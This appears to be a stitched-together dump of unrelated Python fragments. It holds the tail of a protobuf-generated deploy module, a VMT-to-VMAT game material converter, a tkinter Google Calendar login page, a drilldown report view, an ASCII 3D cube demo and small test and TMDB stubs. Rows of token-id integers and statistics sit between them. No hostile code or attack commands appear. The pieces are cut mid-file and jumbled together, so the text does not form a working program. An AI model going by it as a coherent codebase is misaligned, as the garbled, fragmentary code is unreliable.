message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[_CREATEREQUEST_BATCHES, _CREATEREQUEST_INSTANCEINFO, _CREATEREQUEST_OPERATIONINFO, _CREATEREQUEST_CONFIGLIST, _CREATEREQUEST_CONFIGDIFF, ],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=320,
serialized_end=1875,
)
_CREATERESPONSE_DATA = _descriptor.Descriptor(
name='Data',
full_name='deploy.CreateResponse.Data',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='taskId', full_name='deploy.CreateResponse.Data.taskId', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1965,
serialized_end=1987,
)
_CREATERESPONSE = _descriptor.Descriptor(
name='CreateResponse',
full_name='deploy.CreateResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='code', full_name='deploy.CreateResponse.code', index=0,
number=1, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='msg', full_name='deploy.CreateResponse.msg', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='data', full_name='deploy.CreateResponse.data', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[_CREATERESPONSE_DATA, ],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1877,
serialized_end=1987,
)
_CREATERESPONSEWRAPPER = _descriptor.Descriptor(
name='CreateResponseWrapper',
full_name='deploy.CreateResponseWrapper',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='code', full_name='deploy.CreateResponseWrapper.code', index=0,
number=1, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='codeExplain', full_name='deploy.CreateResponseWrapper.codeExplain', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='error', full_name='deploy.CreateResponseWrapper.error', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='data', full_name='deploy.CreateResponseWrapper.data', index=3,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1989,
serialized_end=2100,
)
_CREATEREQUEST_BATCHES.fields_by_name['targets'].message_type = easy__flow__sdk_dot_model_dot_easy__flow_dot_deploy__target__pb2._DEPLOYTARGET
_CREATEREQUEST_BATCHES.containing_type = _CREATEREQUEST
_CREATEREQUEST_INSTANCEINFO.fields_by_name['versionInfo'].message_type = easy__flow__sdk_dot_model_dot_easy__flow_dot_version__info__pb2._VERSIONINFO
_CREATEREQUEST_INSTANCEINFO.containing_type = _CREATEREQUEST
_CREATEREQUEST_OPERATIONINFO.fields_by_name['versionToInfo'].message_type = easy__flow__sdk_dot_model_dot_easy__flow_dot_version__info__pb2._VERSIONINFO
_CREATEREQUEST_OPERATIONINFO.fields_by_name['versionFromInfo'].message_type = easy__flow__sdk_dot_model_dot_easy__flow_dot_version__info__pb2._VERSIONINFO
_CREATEREQUEST_OPERATIONINFO.containing_type = _CREATEREQUEST
_CREATEREQUEST_CONFIGLIST_CONFIGS_ITEMS.containing_type = _CREATEREQUEST_CONFIGLIST_CONFIGS
_CREATEREQUEST_CONFIGLIST_CONFIGS.fields_by_name['items'].message_type = _CREATEREQUEST_CONFIGLIST_CONFIGS_ITEMS
_CREATEREQUEST_CONFIGLIST_CONFIGS.containing_type = _CREATEREQUEST_CONFIGLIST
_CREATEREQUEST_CONFIGLIST.fields_by_name['configs'].message_type = _CREATEREQUEST_CONFIGLIST_CONFIGS
_CREATEREQUEST_CONFIGLIST.containing_type = _CREATEREQUEST
_CREATEREQUEST_CONFIGDIFF_DETAIL_ITEMS.containing_type = _CREATEREQUEST_CONFIGDIFF_DETAIL
_CREATEREQUEST_CONFIGDIFF_DETAIL.fields_by_name['items'].message_type = _CREATEREQUEST_CONFIGDIFF_DETAIL_ITEMS
_CREATEREQUEST_CONFIGDIFF_DETAIL.containing_type = _CREATEREQUEST_CONFIGDIFF
_CREATEREQUEST_CONFIGDIFF.fields_by_name['detail'].message_type = _CREATEREQUEST_CONFIGDIFF_DETAIL
_CREATEREQUEST_CONFIGDIFF.containing_type = _CREATEREQUEST
_CREATEREQUEST.fields_by_name['labels'].message_type = easy__flow__sdk_dot_model_dot_easy__flow_dot_deploy__label__pb2._DEPLOYLABEL
_CREATEREQUEST.fields_by_name['batches'].message_type = _CREATEREQUEST_BATCHES
_CREATEREQUEST.fields_by_name['cluster'].message_type = easy__flow__sdk_dot_model_dot_cmdb_dot_cluster__info__pb2._CLUSTERINFO
_CREATEREQUEST.fields_by_name['instanceInfo'].message_type = _CREATEREQUEST_INSTANCEINFO
_CREATEREQUEST.fields_by_name['operationInfo'].message_type = _CREATEREQUEST_OPERATIONINFO
_CREATEREQUEST.fields_by_name['targetList'].message_type = easy__flow__sdk_dot_model_dot_easy__flow_dot_target__info__pb2._TARGETINFO
_CREATEREQUEST.fields_by_name['packageList'].message_type = easy__flow__sdk_dot_model_dot_easy__flow_dot_package__info__pb2._PACKAGEINFO
_CREATEREQUEST.fields_by_name['configList'].message_type = _CREATEREQUEST_CONFIGLIST
_CREATEREQUEST.fields_by_name['configDiff'].message_type = _CREATEREQUEST_CONFIGDIFF
_CREATERESPONSE_DATA.containing_type = _CREATERESPONSE
_CREATERESPONSE.fields_by_name['data'].message_type = _CREATERESPONSE_DATA
_CREATERESPONSEWRAPPER.fields_by_name['data'].message_type = _CREATERESPONSE
DESCRIPTOR.message_types_by_name['CreateRequest'] = _CREATEREQUEST
DESCRIPTOR.message_types_by_name['CreateResponse'] = _CREATERESPONSE
DESCRIPTOR.message_types_by_name['CreateResponseWrapper'] = _CREATERESPONSEWRAPPER
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
CreateRequest = _reflection.GeneratedProtocolMessageType('CreateRequest', (_message.Message,), {
'Batches' : _reflection.GeneratedProtocolMessageType('Batches', (_message.Message,), {
'DESCRIPTOR' : _CREATEREQUEST_BATCHES,
'__module__' : 'create_pb2'
# @@protoc_insertion_point(class_scope:deploy.CreateRequest.Batches)
})
,
'InstanceInfo' : _reflection.GeneratedProtocolMessageType('InstanceInfo', (_message.Message,), {
'DESCRIPTOR' : _CREATEREQUEST_INSTANCEINFO,
'__module__' : 'create_pb2'
# @@protoc_insertion_point(class_scope:deploy.CreateRequest.InstanceInfo)
})
,
'OperationInfo' : _reflection.GeneratedProtocolMessageType('OperationInfo', (_message.Message,), {
'DESCRIPTOR' : _CREATEREQUEST_OPERATIONINFO,
'__module__' : 'create_pb2'
# @@protoc_insertion_point(class_scope:deploy.CreateRequest.OperationInfo)
})
,
'ConfigList' : _reflection.GeneratedProtocolMessageType('ConfigList', (_message.Message,), {
'Configs' : _reflection.GeneratedProtocolMessageType('Configs', (_message.Message,), {
'Items' : _reflection.GeneratedProtocolMessageType('Items', (_message.Message,), {
'DESCRIPTOR' : _CREATEREQUEST_CONFIGLIST_CONFIGS_ITEMS,
'__module__' : 'create_pb2'
# @@protoc_insertion_point(class_scope:deploy.CreateRequest.ConfigList.Configs.Items)
})
,
'DESCRIPTOR' : _CREATEREQUEST_CONFIGLIST_CONFIGS,
'__module__' : 'create_pb2'
# @@protoc_insertion_point(class_scope:deploy.CreateRequest.ConfigList.Configs)
})
,
'DESCRIPTOR' : _CREATEREQUEST_CONFIGLIST,
'__module__' : 'create_pb2'
# @@protoc_insertion_point(class_scope:deploy.CreateRequest.ConfigList)
})
,
'ConfigDiff' : _reflection.GeneratedProtocolMessageType('ConfigDiff', (_message.Message,), {
'Detail' : _reflection.GeneratedProtocolMessageType('Detail', (_message.Message,), {
'Items' : _reflection.GeneratedProtocolMessageType('Items', (_message.Message,), {
'DESCRIPTOR' : _CREATEREQUEST_CONFIGDIFF_DETAIL_ITEMS,
'__module__' : 'create_pb2'
# @@protoc_insertion_point(class_scope:deploy.CreateRequest.ConfigDiff.Detail.Items)
})
,
'DESCRIPTOR' : _CREATEREQUEST_CONFIGDIFF_DETAIL,
'__module__' : 'create_pb2'
# @@protoc_insertion_point(class_scope:deploy.CreateRequest.ConfigDiff.Detail)
})
,
'DESCRIPTOR' : _CREATEREQUEST_CONFIGDIFF,
'__module__' : 'create_pb2'
# @@protoc_insertion_point(class_scope:deploy.CreateRequest.ConfigDiff)
})
,
'DESCRIPTOR' : _CREATEREQUEST,
'__module__' : 'create_pb2'
# @@protoc_insertion_point(class_scope:deploy.CreateRequest)
})
_sym_db.RegisterMessage(CreateRequest)
_sym_db.RegisterMessage(CreateRequest.Batches)
_sym_db.RegisterMessage(CreateRequest.InstanceInfo)
_sym_db.RegisterMessage(CreateRequest.OperationInfo)
_sym_db.RegisterMessage(CreateRequest.ConfigList)
_sym_db.RegisterMessage(CreateRequest.ConfigList.Configs)
_sym_db.RegisterMessage(CreateRequest.ConfigList.Configs.Items)
_sym_db.RegisterMessage(CreateRequest.ConfigDiff)
_sym_db.RegisterMessage(CreateRequest.ConfigDiff.Detail)
_sym_db.RegisterMessage(CreateRequest.ConfigDiff.Detail.Items)
CreateResponse = _reflection.GeneratedProtocolMessageType('CreateResponse', (_message.Message,), {
'Data' : _reflection.GeneratedProtocolMessageType('Data', (_message.Message,), {
'DESCRIPTOR' : _CREATERESPONSE_DATA,
'__module__' : 'create_pb2'
# @@protoc_insertion_point(class_scope:deploy.CreateResponse.Data)
})
,
'DESCRIPTOR' : _CREATERESPONSE,
'__module__' : 'create_pb2'
# @@protoc_insertion_point(class_scope:deploy.CreateResponse)
})
_sym_db.RegisterMessage(CreateResponse)
_sym_db.RegisterMessage(CreateResponse.Data)
CreateResponseWrapper = _reflection.GeneratedProtocolMessageType('CreateResponseWrapper', (_message.Message,), {
'DESCRIPTOR' : _CREATERESPONSEWRAPPER,
'__module__' : 'create_pb2'
# @@protoc_insertion_point(class_scope:deploy.CreateResponseWrapper)
})
_sym_db.RegisterMessage(CreateResponseWrapper)
# @@protoc_insertion_point(module_scope)
| [
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
2,
2980,
515,
416,
262,
8435,
11876,
17050,
13,
220,
8410,
5626,
48483,
0,
198,
2,
2723,
25,
2251,
13,
1676,
1462,
198,
198,
11748,
25064,
198,
62,
65,
28,
17597,
13... | 2.419066 | 16,291 |
from django.test import TestCase
import pandas as pd
from services.IndicatorCalc.indicators import BollingerIndicator, Indicator
from services.Utils.test_pusher import convert_to_dicts
from .signalgenerator import SignalGenerator
| [
6738,
42625,
14208,
13,
9288,
1330,
6208,
20448,
198,
198,
11748,
19798,
292,
355,
279,
67,
198,
198,
6738,
2594,
13,
5497,
26407,
9771,
66,
13,
521,
44549,
1330,
43479,
3889,
5497,
26407,
11,
1423,
26407,
198,
6738,
2594,
13,
18274,
... | 3.530303 | 66 |
# Converts Source 1 .vmt material files to simple Source 2 .vmat files.
#
# Copyright (c) 2016 Rectus
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
# Usage Instructions:
# python vmt_to_vmat.py MODNAME OPTIONAL_PATH_TO_FOLDER
import sys
import os
import os.path
from os import path
import re
from PIL import Image
import PIL.ImageOps
# What shader to use.
SHADER = 'vr_standard'
# File format of the textures.
TEXTURE_FILEEXT = '.tga'
# substring added after an alpha map's name, but before the extension
MAP_SUBSTRING = '_alpha'
# this leads to the root of the game folder, i.e. dota 2 beta/content/dota_addons/, make sure to remember the final slash!!
PATH_TO_GAME_CONTENT_ROOT = ""
PATH_TO_CONTENT_ROOT = ""
# Set this to True if you wish to overwrite your old vmat files
OVERWRITE_VMAT = True
# material types need to be lowercase because python is a bit case sensitive
materialTypes = [
"vertexlitgeneric",
"unlitgeneric",
"lightmappedgeneric",
"patch",
"teeth",
"eyes",
"eyeball",
#"modulate",
"water", #TODO: integrate water/refract shaders into this script
"refract",
"worldvertextransition",
#"lightmapped_4wayblend",
"unlittwotexture", #TODO: make this system functional
#"lightmappedreflective",
#"cables"
]
ignoreList = [
"vertexlitgeneric_hdr_dx9",
"vertexlitgeneric_dx9",
"vertexlitgeneric_dx8",
"vertexlitgeneric_dx7",
"lightmappedgeneric_hdr_dx9",
"lightmappedgeneric_dx9",
"lightmappedgeneric_dx8",
"lightmappedgeneric_dx7",
]
#flipNormalMap("materials/models/player/demo/demoman_normal.tga")
#extractAlphaTextures("materials/models/bots/boss_bot/carrier_body.tga")
###
### Main Execution
###
globalVars = text_parser("global_vars.txt", " = ")
PATH_TO_GAME_CONTENT_ROOT = globalVars["gameContentRoot"]
PATH_TO_CONTENT_ROOT = PATH_TO_GAME_CONTENT_ROOT + sys.argv[1] + "/"
print(PATH_TO_CONTENT_ROOT)
if(PATH_TO_GAME_CONTENT_ROOT == ""):
print("ERROR: Please open vmt_to_vmat in your favorite text editor, and modify PATH_TO_GAME_CONTENT_ROOT to lead to your games content files (i.e. ...\steamvr_environments\content\steamtours_addons\)")
quit()
print('Source 2 Material Conveter! By Rectus via Github.')
print('Initially forked by Alpyne, this version by caseytube.')
print('--------------------------------------------------------------------------------------------------------')
# Verify file paths
fileList = []
if(len(sys.argv) == 3):
absFilePath = os.path.abspath(sys.argv[2])
if os.path.isdir(absFilePath):
fileList.extend(parseDir(absFilePath))
elif(absFilePath.lower().endswith('.vmt')):
fileList.append(absFilePath)
else:
print("ERROR: File path is invalid. required format: vmt_to_vmat.py modName C:\optional\path\to\root")
quit()
elif(len(sys.argv) == 2):
absFilePath = os.path.abspath(PATH_TO_CONTENT_ROOT)
print(PATH_TO_CONTENT_ROOT)
if os.path.isdir(absFilePath):
fileList.extend(parseDir(absFilePath))
elif(absFilePath.lower().endswith('.vmt')):
fileList.append(absFilePath)
else:
print("ERROR: File path is invalid. required format: vmt_to_vmat.py modName C:\optional\path\to\root")
quit()
else:
print("ERROR: CMD Arguments are invalid. Required format: vmt_to_vmat.py modName C:\optional\path\to\root")
quit()
# Main function, loop through every .vmt
for fileName in fileList:
print('--------------------------------------------------------------------------------------------------------')
print('+ Loading File:\n' + fileName)
vmtParameters = {}
validMaterial = False
validPatch = False
skipNextLine = False
matType = ""
patchFile = ""
basetexturePath = ""
bumpmapPath = ""
phong = False; #also counts for rimlight since they feed off each other
baseMapAlphaPhongMask = False
envMap = False
baseAlphaEnvMapMask = False
envMapMask = False
normalMapAlphaEnvMapMask = False
selfIllum = False
translucent = False #also counts for alphatest
alphatest = False
wroteReflectanceRange = False
with open(fileName, 'r') as vmtFile:
for line in vmtFile.readlines():
if any(wd in line.lower() for wd in materialTypes):
validMaterial = True
matType = line.lower()
if skipNextLine:
if "]" in line or "}" in line:
skipNextLine = False
else:
parseVMTParameter(line, vmtParameters)
if any(wd in line.lower() for wd in ignoreList):
skipNextLine = True
if '"patch"' in matType.lower():
patchFile = vmtParameters["include"].replace('"', '').replace("'", '');
print("+ Patching materials details from: " + patchFile)
with open(PATH_TO_CONTENT_ROOT + patchFile, 'r') as vmtFile:
for line in vmtFile.readlines():
if any(wd in line.lower() for wd in materialTypes):
validPatch = True
parseVMTParameter(line, vmtParameters)
if not validPatch:
print("+ Patch file is not a valid material. Skipping!")
continue
if validMaterial:
vmatFileName = fileName.replace('.vmt', '') + '.vmat'
if os.path.exists(vmatFileName) and not OVERWRITE_VMAT:
print('+ File already exists. Skipping!')
continue
print('+ Converting ' + os.path.basename(fileName))
with open(vmatFileName, 'w') as vmatFile:
vmatFile.write('// Converted with vmt_to_vmat.py\n\n')
vmatFile.write('Layer0\n{\n\tshader "' + SHADER + '.vfx"\n\n')
for key, val in vmtParameters.items():
vmatFile.write(getVmatParameter(key, val))
if(key.lower() == "$phong" or key.lower() == "$rimlight"):
if val.strip('"' + "'") != "0":
phong = True
elif(key.lower() == "$basemapalphaphongmask"):
if val.strip('"' + "'") != "0":
baseMapAlphaPhongMask = True
elif(key.lower() == "$selfillum"):
if val.strip('"' + "'") != "0":
print("selfillum")
selfIllum = True
elif(key.lower() == "$translucent"):
if val.strip('"' + "'") != "0":
translucent = True
elif(key.lower() == "$alphatest"):
if val.strip('"' + "'") != "0":
alphatest = True
elif(key.lower() == "$basetexture"):
basetexturePath = val.lower().strip().replace('.vtf', '')
elif(key.lower() == "$bumpmap"):
bumpmapPath = val.lower().strip().replace('.vtf', '')
elif(key.lower() == "$envmap"):
envMap = True
elif(key.lower() == "$basealphaenvmapmask"):
if val.strip('"' + "'") != "0":
baseAlphaEnvMapMask = True
elif(key.lower() == "$normalmapalphaenvmapmask"):
if val.strip('"' + "'") != "0":
normalMapAlphaEnvMapMask = True
elif(key.lower() == "$envmapmask"):
if val.strip('"' + "'") != "0":
envMapMask = True
#check if base texture is empty
if "metal" in vmatFileName:
vmatFile.write("\tg_flMetalness 1.000\n")
if translucent:
vmatFile.write('\tF_TRANSLUCENT 1\n\tTextureTranslucency ' + fixTexturePath(basetexturePath, MAP_SUBSTRING) + '\n')
extractAlphaTextures("materials/" + basetexturePath.replace('"', '') + TEXTURE_FILEEXT, False)
if alphatest:
vmatFile.write('\tF_ALPHA_TEST 1\n\tTextureTranslucency ' + fixTexturePath(basetexturePath, MAP_SUBSTRING) + '\n')
extractAlphaTextures("materials/" + basetexturePath.replace('"', '') + TEXTURE_FILEEXT, False)
hasReflectance = False
if phong:
if not wroteReflectanceRange:
vmatFile.write('\t' + globalVars["reflectanceRange"] + '\n')
wroteReflectanceRange = True
if baseMapAlphaPhongMask and basetexturePath != '':
hasReflectance = True
vmatFile.write('\tTextureReflectance ' + fixTexturePath(basetexturePath, MAP_SUBSTRING) + '\n')
extractAlphaTextures("materials/" + basetexturePath.replace('"', '') + TEXTURE_FILEEXT, True)
else:
if(bumpmapPath == '') and not (baseAlphaEnvMapMask or normalMapAlphaEnvMapMask):
vmatFile.write('\tTextureReflectance "[1.000000 1.000000 1.000000 0.000000]"\n')
#extractAlphaTextures("materials/" + basetexturePath.replace('"', '') + TEXTURE_FILEEXT, True)
else:
hasReflectance = True
vmatFile.write('\tTextureReflectance ' + fixTexturePath(bumpmapPath, MAP_SUBSTRING) + '\n')
extractAlphaTextures("materials/" + bumpmapPath.replace('"', '') + TEXTURE_FILEEXT, True)
if envMap:
if not wroteReflectanceRange:
vmatFile.write('\t' + globalVars["reflectanceRange"] + '\n')
wroteReflectanceRange = True
if baseAlphaEnvMapMask and not normalMapAlphaEnvMapMask and basetexturePath != '' and not hasReflectance:
vmatFile.write('\tTextureReflectance ' + fixTexturePath(basetexturePath, MAP_SUBSTRING) + '\n')
#Weird hack, apparently envmaps for LightmappedGeneric are flipped, whereas VertexLitGeneric ones aren't
if "lightmappedgeneric" in matType:
extractAlphaTextures("materials/" + basetexturePath.replace('"', '') + TEXTURE_FILEEXT, True)
elif "vertexlitgeneric" in matType:
extractAlphaTextures("materials/" + basetexturePath.replace('"', '') + TEXTURE_FILEEXT, True)
if normalMapAlphaEnvMapMask and bumpmapPath != '' and not hasReflectance:
vmatFile.write('\tTextureReflectance ' + fixTexturePath(bumpmapPath, MAP_SUBSTRING) + '\n')
#Weird hack, apparently envmaps for LightmappedGeneric are flipped, whereas VertexLitGeneric ones aren't
if "lightmappedgeneric" in matType:
extractAlphaTextures("materials/" + bumpmapPath.replace('"', '') + TEXTURE_FILEEXT, True)
elif "vertexlitgeneric" in matType:
extractAlphaTextures("materials/" + bumpmapPath.replace('"', '') + TEXTURE_FILEEXT, True)
if selfIllum:
vmatFile.write('\tF_SELF_ILLUM 1\n\tTextureSelfIllumMask ' + fixTexturePath(basetexturePath, MAP_SUBSTRING) + '\n')
extractAlphaTextures("materials/" + basetexturePath.replace('"', '') + TEXTURE_FILEEXT, False)
vmatFile.write('}\n')
bumpmapConvertedList = PATH_TO_CONTENT_ROOT + "convertedBumpmaps.txt"
if not os.path.exists(bumpmapConvertedList):
print('ERROR: Please create an empty text file named "convertedBumpmaps.txt" in the root of your mod files (i.e. content/steamtours_addons/hl2)')
quit()
# flip the green channels of any normal maps
if(bumpmapPath != ""):
print("Checking if normal file " + bumpmapPath + " has been converted")
foundMaterial = False
with open(bumpmapConvertedList, 'r+') as bumpList: #change the read type to write
for line in bumpList.readlines():
if line.rstrip() == bumpmapPath.rstrip():
foundMaterial = True
if not foundMaterial:
flipNormalMap(fixTexturePath(bumpmapPath).strip("'" + '"'))
print("flipped normal map of " + bumpmapPath)
#append bumpmapPath to bumpmapCovertedList
bumpList.write(bumpmapPath + "\n")
bumpList.close()
# TODO: reparse the vmt, see i.e. if alphatest, then TextureTranslucency "path/to/tex/name_alpha.tga",
# basemap alpha can either be a transparency mask, selfillum mask, or specular mask
# normalmap alpha can be a phong mask by default
# if $translucent/$alphatest
# TextureTranslucency "path/to/tex/basetexture_alpha.tga"
# if $rimlight/$phong in vmt
# if $basemapalphaphongmask in vmt
#TextureRimMask/TextureSpecularMask "path/to/tex/basetexture_alpha.tga"
# else
#TextureRimMask/TextureSpecularMask "path/to/tex/bumpmap_alpha.tga"
# if $selfillum in vmt
# Add Mask 1
# TextureSelfIllumMask "path/to/tex/basetexture_alpha.tga"
# input("\nDone, press ENTER to continue...")
| [
2,
1482,
24040,
8090,
352,
764,
14761,
83,
2587,
3696,
284,
2829,
8090,
362,
764,
85,
6759,
3696,
13,
198,
2,
198,
2,
15069,
357,
66,
8,
1584,
48599,
385,
198,
2,
198,
2,
2448,
3411,
318,
29376,
7520,
11,
1479,
286,
3877,
11,
28... | 2.252122 | 6,243 |
import pytest
import zmq
from plenum.test.client.helper import create_zmq_connection
@pytest.fixture()
| [
11748,
12972,
9288,
198,
11748,
1976,
76,
80,
198,
198,
6738,
458,
44709,
13,
9288,
13,
16366,
13,
2978,
525,
1330,
2251,
62,
89,
76,
80,
62,
38659,
628,
198,
31,
9078,
9288,
13,
69,
9602,
3419,
628
] | 2.815789 | 38 |
from clge.Behaviour import Vector3, Vector2, World
from clge.Behaviour.Components.ThreeDimensions.AsciiRenderer3D import AsciiRenderer3D
from clge.Behaviour.Components.ThreeDimensions.Mesh3D import Mesh3D
from clge.Behaviour.Components.ThreeDimensions.Transform3D import Transform3D
from clge.Constants import CoordinateSystems
from clge.GameMath import Matrix
from clge import AltScreen
from clge.Behaviour.Behaviour import Behaviour
w = 100
h = w / 2
scr = AltScreen(int(w), int(h), True)
scr.auto_clear_objects_list_setter(True)
scr.change_coordinate_system(CoordinateSystems.MIDDLE_MIDDLE)
scr.set_timeout(.05)
angle = 0
points = [
Vector3(-10, -10, -10),
Vector3(10, -10, -10),
Vector3(10, 10, -10),
Vector3(-10, 10, -10),
Vector3(-10, -10, 10),
Vector3(10, -10, 10),
Vector3(10, 10, 10),
Vector3(-10, 10, 10),
]
scr.FunctionManager.registerUpdate(update)
scr.Start()
| [
6738,
537,
469,
13,
25267,
37716,
1330,
20650,
18,
11,
20650,
17,
11,
2159,
198,
6738,
537,
469,
13,
25267,
37716,
13,
7293,
3906,
13,
12510,
29271,
5736,
13,
1722,
979,
72,
49,
437,
11882,
18,
35,
1330,
1081,
979,
72,
49,
437,
11... | 2.54039 | 359 |
# -*- coding: utf-8 -*-
"""
Copyright (C) 2017 IBM Corporation
Licensed under the Apache License, Version 2.0 (the “License”);
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an “AS IS” BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Contributors:
* Roberto Oliveira <rdutra@br.ibm.com>
* Rafael Peria de Sene <rpsene@br.ibm.com>
"""
from drilldown_model import DrilldownModel
TABULATION = " "
class DrilldownView(object):
""" This class represents the drilldown view """
def print_drilldown(self, event, report_file, threshold):
""" Print the drilldown view based on drilldown model """
drilldown_model = DrilldownModel()
ui_binmodule_list = drilldown_model.create_drilldown_model(report_file)
title = "Drilldown for event: " + event
border = self.__get_border(title)
self.__print_logo(title, border)
# For each binModule
for ui_binmodule in ui_binmodule_list:
# Do not print values smaller than the threshold value
if ui_binmodule.get_percentage() < threshold:
continue
print_binmodule = True
# For each symbol
for ui_symbol in ui_binmodule.get_symbols_list():
# Do not print values smaller than the threshold value
if ui_symbol.get_percentage() < threshold:
continue
if print_binmodule:
# If not the first element, print a new line
if ui_binmodule is not ui_binmodule_list[0]:
print ""
print ui_binmodule.get_text()
print_binmodule = False
print TABULATION + ui_symbol.get_text()
# For each sample
for ui_sample in ui_symbol.get_samples_list():
print TABULATION + TABULATION + ui_sample.get_text()
print border + "\n"
@staticmethod
def __print_logo(title, border):
""" Print the drilldown logo """
print ""
print border
print title
print border
@staticmethod
def __get_border(title):
""" Get the border """
return "=" * len(title)
| [
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
198,
37811,
198,
15269,
357,
34,
8,
2177,
19764,
10501,
198,
198,
26656,
15385,
739,
262,
24843,
13789,
11,
10628,
362,
13,
15,
357,
1169,
564,
250,
34156,
447,
251,
1... | 2.346642 | 1,102 |
import tkinter as tk
import json
from calendarauth import CalendarAuthenticator
class CalendarLoginPage(tk.Frame):
"""Menu page for logging into google calendar.
CalendarLoginPage inherits from tkinter's frame page. It's purpose
is to provide end user with interface to authenticate and authorize
google calendar access.
"""
def _reset_page(self, event):
"""Resets page's state and updates list of available users."""
# Loading id_name_dict state from json file.
with open('../resources/dicts/id_name_dict.json', 'r') as id_name_dict_json:
self._id_name_dict = json.load(id_name_dict_json)
# Removing all listbox entries and filling it with values from
# newly loaded dictionary.
self._user_listbox.delete(0, tk.END)
for key, value in self._id_name_dict.items():
self._name_id_dict[value] = key
self._user_listbox.insert(tk.END, value)
def _authenticate_user(self):
"""Starts calendar authentication for selected user."""
index = self._user_listbox.curselection()
if len(index) > 0:
user_name = self._user_listbox.get(index[0])
user_id = self._name_id_dict[user_name]
self._user_login_button.config(state=tk.DISABLED)
self._cancel_button.config(state=tk.ACTIVE)
self._calendar_authenticator.start_authentication()
self._save_credentials(user_id)
def _save_credentials(self, user_id):
"""Saves user's credentials if authentication is completed."""
# TODO Add pop up confirming that authentication has been
# successfully completed.
returncode, credentials = self._calendar_authenticator.get_credentials()
if returncode == 0:
self._id_credentials_dict[user_id] = credentials
self._user_login_button.config(state=tk.ACTIVE)
self._cancel_button.config(state=tk.DISABLED)
else:
# Authentication was not completed so we schedule this
# function for later.
self.after(200, self._save_credentials, user_id)
def _cancel_authentication(self):
"""Stops authentication and resets buttons' state."""
self._cancel_button.config(state=tk.DISABLED)
self._user_login_button.config(state=tk.ACTIVE)
self._calendar_authenticator.cancel_authentication()
| [
11748,
256,
74,
3849,
355,
256,
74,
198,
11748,
33918,
198,
198,
6738,
2386,
437,
3301,
1071,
1330,
26506,
47649,
26407,
628,
198,
4871,
26506,
47790,
9876,
7,
30488,
13,
19778,
2599,
198,
220,
220,
220,
37227,
23381,
2443,
329,
18931,
... | 2.511411 | 964 |
import os
import time
import json
import http.client
from pprint import pprint
import tmdbsimple as tmdb
from PyInquirer import prompt, style_from_dict, Token
class Movie(object):
"""
:param image: (str)
:param id: (int)
:param names: ([str])
:param posters: ([str])
:param lang: (str)
"""
